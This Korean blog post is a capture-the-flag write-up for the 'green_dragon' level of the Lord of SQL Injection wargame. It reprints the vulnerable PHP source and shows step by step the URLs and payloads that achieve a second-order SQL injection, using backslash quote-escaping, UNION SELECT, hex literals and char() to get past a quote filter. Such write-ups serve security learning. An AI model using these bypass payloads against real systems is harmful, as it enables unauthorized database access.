[Lord Of SQL Injection] N 25번(평문 → ASCII → hex)
Kwon Oh! JUN 2022. 2. 18. 02:31
query : select id,pw from prob_green_dragon where id='' and pw=''
<?php
// LOS "green_dragon" challenge source, as printed by highlight_file() at the end.
// Security-relevant flow: both GET parameters are filtered and then interpolated
// unescaped into $query; the FIRST ROW that $query returns is filtered again and
// interpolated, still unescaped, into $query2. Because the filter only rejects
// the substrings prob, _, ., ', " a UNION SELECT in $query can hand arbitrary
// filter-clean strings to $query2 — a second-order SQL injection.
// NOTE(review): the real fix is a prepared statement for both queries; the code
// is left unchanged here because it is the challenge being analysed.
include "./config.php";
login_chk();
$db = dbconnect();
// Input filter (case-insensitive): rejects prob, _, ., ' and " only. Backslash,
// #, union/select, hex literals and char() all pass.
// Bareword keys ($_GET[id]) rely on the undefined-constant fallback — presumably
// a notice on older PHP and an Error on PHP 8; verify against the host's PHP.
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[pw])) exit("No Hack ~_~");
// Untrusted id/pw go straight into the SQL string. A lone backslash in id
// escapes the closing quote, so "' and pw='" becomes part of the id string and
// the pw value is parsed as bare SQL.
$query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
// @ suppresses mysqli errors: a syntactically broken $query just yields no row.
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']){
// Same filter, but applied to the values the DATABASE returned — which the
// attacker chooses via UNION SELECT in $query.
if(preg_match('/prob|_|\.|\'|\"/i', $result['id'])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $result['pw'])) exit("No Hack ~_~");
// Second-order injection point: $result[id] / $result[pw] are interpolated
// without escaping. Only one column is selected here, so an injected UNION
// must also select exactly one column.
$query2 = "select id from prob_green_dragon where id='{$result[id]}' and pw='{$result[pw]}'";
echo "<hr>query2 : <strong>{$query2}</strong><hr><br>";
// No @ here, so an error in $query2 is not suppressed.
$result = mysqli_fetch_array(mysqli_query($db,$query2));
// The row $query2 actually returns must carry id "admin".
if($result['id'] == "admin") solve("green_dragon");
}
highlight_file(__FILE__);
?>
핵심 코드만 뽑아서 설명하면 다음과 같다 (작은따옴표(')가 필터에 걸리는 점도 같이 본다).
// Excerpt of the two interpolation points: the row fetched by $query is fed
// into $query2 unescaped, so controlling that row controls the second query.
$query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
// $result[id] / $result[pw] are attacker-chosen via UNION SELECT in $query.
$query2 = "select id from prob_green_dragon where id='{$result[id]}' and pw='{$result[pw]}'";
$result = mysqli_fetch_array(mysqli_query($db,$query2));
if($result['id'] == "admin") solve("green_dragon");
$query에는 GET으로 받은 id, pw가 이스케이프 없이 그대로 들어간 쿼리문이 만들어지고, 그 쿼리가 반환한 첫 번째 행(id, pw 컬럼)이 $result에 들어간다.
$query2에는 $result[id], $result[pw]가 다시 이스케이프 없이 그대로 들어가므로, $query가 반환하는 행을 조작하면 $query2도 조작할 수 있다(2차 인젝션). 다만 $result['id']가 참이어야 $query2가 실행되고, $result[id]와 $result[pw] 둘 다 preg_match 필터(prob, _, ., ', ")를 통과해야 하므로 두 값을 모두 신경 써야 한다.
$query2가 반환한 행이 다시 $result에 들어가고, 그 행의 id가 "admin"이면 문제가 해결된다. 즉 $query2가 실제로 반환하는 id 값을 admin으로 만드는 것이 목표다.
https://los.rubiya.kr/chall/green_dragon_74d944f888fd3f9cf76e4e230e78c45b.php?id=\&pw=union%20select%201,2%23
query : select id,pw from prob_green_dragon where id='\' and pw='union select 1,2#'
query2 : select id from prob_green_dragon where id='1' and pw='2'
<?php
// Challenge source as re-printed by highlight_file() after the first probe
// (id=\ , pw=union select 1,2#). The code itself is unchanged between runs.
include "./config.php";
login_chk();
$db = dbconnect();
// Input filter: prob, _, ., ', " only — backslash, # and UNION are allowed.
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[pw])) exit("No Hack ~_~");
// id=\ escapes the closing quote, so pw is parsed as bare SQL.
$query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
// @ hides mysqli errors; a broken $query simply returns no row.
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']){
// Filter re-applied to the returned row, which the UNION lets the attacker choose.
if(preg_match('/prob|_|\.|\'|\"/i', $result['id'])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $result['pw'])) exit("No Hack ~_~");
// Second-order injection point: row values interpolated without escaping.
$query2 = "select id from prob_green_dragon where id='{$result[id]}' and pw='{$result[pw]}'";
echo "<hr>query2 : <strong>{$query2}</strong><hr><br>";
$result = mysqli_fetch_array(mysqli_query($db,$query2));
if($result['id'] == "admin") solve("green_dragon");
}
highlight_file(__FILE__);
?>
select id,pw from prob_green_dragon where id='\' and pw='union select 1,2#'
id에 넣은 \가 바로 뒤의 작은따옴표를 이스케이프하므로, MySQL은 \' and pw= 까지를 id 문자열 하나로 읽는다.
이 문자열과 같은 id를 가진 행은 없으니 원래 SELECT는 아무 행도 반환하지 않고, pw 자리에 들어간 union select 1,2 가 SQL로 해석되어 id=1, pw=2인 행이 만들어진다(# 은 뒤에 남은 작은따옴표를 주석 처리한다).
그래서 $result[id]=1, $result[pw]=2가 되어 query2가 만들어지는 것을 확인할 수 있다.
query2에서도 같은 방법(id 자리에 \, pw 자리에 union select)을 쓰면 되므로, $query의 UNION이 그런 값을 행으로 반환하게 만들면 된다.
https://los.rubiya.kr/chall/green_dragon_74d944f888fd3f9cf76e4e230e78c45b.php?id=\&pw=union%20select%20\,%202%23
query : select id,pw from prob_green_dragon where id='\' and pw='union select \, 2#'
<?php
// Challenge source as re-printed after the probe pw=union select \, 2#.
// Only "query :" was printed above — $query2 never ran, because a bare
// backslash in the select list is a MySQL syntax error and @ hid it.
include "./config.php";
login_chk();
$db = dbconnect();
// Input filter: prob, _, ., ', " only.
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[pw])) exit("No Hack ~_~");
// Untrusted input interpolated unescaped.
$query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
// @ suppresses the syntax error; $result is then empty and the branch below is skipped.
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']){
if(preg_match('/prob|_|\.|\'|\"/i', $result['id'])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $result['pw'])) exit("No Hack ~_~");
// Second-order injection point.
$query2 = "select id from prob_green_dragon where id='{$result[id]}' and pw='{$result[pw]}'";
echo "<hr>query2 : <strong>{$query2}</strong><hr><br>";
$result = mysqli_fetch_array(mysqli_query($db,$query2));
if($result['id'] == "admin") solve("green_dragon");
}
highlight_file(__FILE__);
?>
1을 \로 바꾸면 query2가 출력되지 않는다. union select \, 2 에서 \는 문자열 리터럴 밖의 bare 문자라 MySQL 문법 오류가 나고, @로 에러가 숨겨진 채 $query가 아무 행도 반환하지 않기 때문이다.
작은따옴표는 필터에 걸려 쓸 수 없으니, MySQL이 문자열로 취급하는 hex 리터럴(0x5c = '\')로 바꿔 보았다.
https://los.rubiya.kr/chall/green_dragon_74d944f888fd3f9cf76e4e230e78c45b.php?id=\&pw=union%20select%200x5c,%202%23
query : select id,pw from prob_green_dragon where id='\' and pw='union select 0x5c, 2#'
query2 : select id from prob_green_dragon where id='\' and pw='2'
<?php
// Challenge source as re-printed after the probe pw=union select 0x5c, 2#.
// The hex literal 0x5c is returned as the string "\" in $result[id], so
// $query2 above was built with id='\' — the quote escape now happens in query2.
include "./config.php";
login_chk();
$db = dbconnect();
// Input filter: prob, _, ., ', " only — hex literals pass.
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']){
// Returned "\" contains none of the filtered characters, so it passes.
if(preg_match('/prob|_|\.|\'|\"/i', $result['id'])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $result['pw'])) exit("No Hack ~_~");
// Second-order injection point: id='\' escapes the quote, pw becomes bare SQL.
$query2 = "select id from prob_green_dragon where id='{$result[id]}' and pw='{$result[pw]}'";
echo "<hr>query2 : <strong>{$query2}</strong><hr><br>";
$result = mysqli_fetch_array(mysqli_query($db,$query2));
if($result['id'] == "admin") solve("green_dragon");
}
highlight_file(__FILE__);
?>
\를 hex 리터럴 0x5c로 바꾸니 $result[id]에 문자열 \가 들어가 query2가 정상적으로 만들어진다. query2에서도 id='\' and pw=' 가 하나의 문자열로 묶이면서, 이제 pw 자리의 값이 SQL로 해석될 준비가 된 것이다.
\는 해결완료!
이제 뒤에 쿼리를 확인해보겠다.
https://los.rubiya.kr/chall/green_dragon_74d944f888fd3f9cf76e4e230e78c45b.php?id=\&pw=union%20select%200x5c,%20union%20select%20%27admin%27%23
select id,pw from prob_green_dragon where id='\' and pw='union select 0x5c, union select 'admin'#'
위와 같은 쿼리를 만들어야 하지만, pw에 작은따옴표(')가 들어가면 쿼리가 실행되기도 전에 preg_match 필터에 걸려 No Hack이 출력된다.
그래서 'admin' 대신 MySQL의 char() 함수로 ASCII 코드(char(97,100,109,105,110))를 문자열로 만들어 따옴표 없이 표현했다.
https://los.rubiya.kr/chall/green_dragon_74d944f888fd3f9cf76e4e230e78c45b.php?id=\&pw=union%20select%200x5c,%20union%20select%20char(97,100,109,105,110)%23
query : select id,pw from prob_green_dragon where id='\' and pw='union select 0x5c, union select char(97,100,109,105,110)#'
<?php
// Challenge source as re-printed after the probe
// pw=union select 0x5c, union select char(97,100,109,105,110)#.
// Only "query :" was printed: inside $query's select list the second
// "union select char(...)#" is bare SQL, not a string, so $query is a syntax
// error and (with @) returns no row.
include "./config.php";
login_chk();
$db = dbconnect();
// Input filter: prob, _, ., ', " only — char() and # pass.
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
// @ hides the syntax error; empty $result skips the block below.
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']){
if(preg_match('/prob|_|\.|\'|\"/i', $result['id'])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $result['pw'])) exit("No Hack ~_~");
// Second-order injection point: the pw payload must reach here as string DATA.
$query2 = "select id from prob_green_dragon where id='{$result[id]}' and pw='{$result[pw]}'";
echo "<hr>query2 : <strong>{$query2}</strong><hr><br>";
$result = mysqli_fetch_array(mysqli_query($db,$query2));
if($result['id'] == "admin") solve("green_dragon");
}
highlight_file(__FILE__);
?>
query2가 출력되지 않는다. \ 때와 같은 이유로, $query의 select 목록 안에서 union select char(...)# 은 문자열이 아니라 bare SQL이라 문법 오류가 나기 때문이다.
query2에 넣을 값은 $query가 "문자열 데이터"로 반환해야 하므로, union select char(97,100,109,105,110)# 전체를 hex 리터럴(0x756e696f6e...2923)로 바꿔 주었다. 이 값에는 필터 문자(prob, _, ., ', ")가 하나도 없어 $result[pw] 검사도 그대로 통과한다.
https://los.rubiya.kr/chall/green_dragon_74d944f888fd3f9cf76e4e230e78c45b.php?id=\&pw=union%20select%200x5c,%200x756e696f6e2073656c65637420636861722839372c3130302c3130392c3130352c3131302923%23
query : select id,pw from prob_green_dragon where id='\' and pw='union select 0x5c, 0x756e696f6e2073656c65637420636861722839372c3130302c3130392c3130352c3131302923#'
query2 : select id from prob_green_dragon where id='\' and pw='union select char(97,100,109,105,110)#'
GREEN_DRAGON Clear!
<?php
// Challenge source as re-printed after the solving request. $query's UNION
// returned id="\" and pw="union select char(97,100,109,105,110)#" as plain
// strings (both hex literals); both pass the filter, and $query2 became
//   select id from prob_green_dragon where id='\' and pw='union select char(...)#'
// whose UNION yields a row with id "admin".
include "./config.php";
login_chk();
$db = dbconnect();
// Input filter: prob, _, ., ', " only.
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[pw])) exit("No Hack ~_~");
// Untrusted input interpolated unescaped (first-order injection).
$query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']){
// Filter on DB-returned values; the hex-delivered payload contains none of them.
if(preg_match('/prob|_|\.|\'|\"/i', $result['id'])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $result['pw'])) exit("No Hack ~_~");
// Second-order injection point: id='\' escapes the quote, pw runs as SQL.
$query2 = "select id from prob_green_dragon where id='{$result[id]}' and pw='{$result[pw]}'";
echo "<hr>query2 : <strong>{$query2}</strong><hr><br>";
$result = mysqli_fetch_array(mysqli_query($db,$query2));
// The injected single-column UNION makes this row's id "admin".
if($result['id'] == "admin") solve("green_dragon");
}
highlight_file(__FILE__);
?>
해결완료!!